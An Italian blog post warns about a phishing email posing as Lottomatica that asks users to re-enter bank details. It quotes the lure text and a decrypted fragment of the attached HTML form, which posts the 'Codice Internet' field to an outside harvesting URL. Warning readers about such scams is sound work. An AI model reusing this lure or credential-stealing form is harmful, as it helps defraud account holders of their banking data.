Altra email di tante simili ma con un target più ampio, anche perchè prende in considerazione il servizio Lottomatica, che prevede non solo giochi on line ma anche le carte Paypal ed altri servizi on line. Una delle mail arriva con il seguente testo:
Gentile Utente,
Per i motivi di sicurezza abbiamo sospeso il Vostro conto
corrente, una
misura di sicurezza progettata per contribuire a proteggere Voi
ed il
Vostro conto. Dovete riconfermare i Vs. dati riguardanti il conto
corrente per ristabilire le funzionalita del vostro conto, e
confermare
quindi che non siete stati vittime di furto informatico.
Dovete reinserire i Vs. dati alla seguente pagina per realizzare
il
processo di verifica.
Inviare il modulo allegato al tuo indirizzo email al fine di
verificare il
vostro conto Lottomaticard.
La ringraziamo per la Vostra cortese collaborazione.
Lottomatica Group S.p.A P.IVA 08028081001
In allegato un file .html con uno script criptato apparentemente da iwebtool che riproduce un form simile a quelli di Lottomatica. Il servizio ovviamenteè falso e il form porta i dati verso un sito americano http://www.tascoenterprises.com/images/submit.php che reindirizza ad una pagina di ulteriore reindirizzo verso il sito di Lottomatica, prendendo per i dati inviati carpendo quindi il vostro conto corrente.
Un pezzo del codice decriptato è:
<form action=”http://www.tascoenterprises.com/images/submit.php” method=”post” name=”com-login” id=”com-form-login”>
<p id=”com-form-login-username”>
<label for=”username”>Codice Internet:</label>
<input name=”username” id=”username” alt=”username” size=”18″ type=”text”>
E’ ovvio che NON bisogno mai rispondere ne mandare dati a nessuno via email o allegati.
cod:2889
0 comments
Aggiungi il tuo commento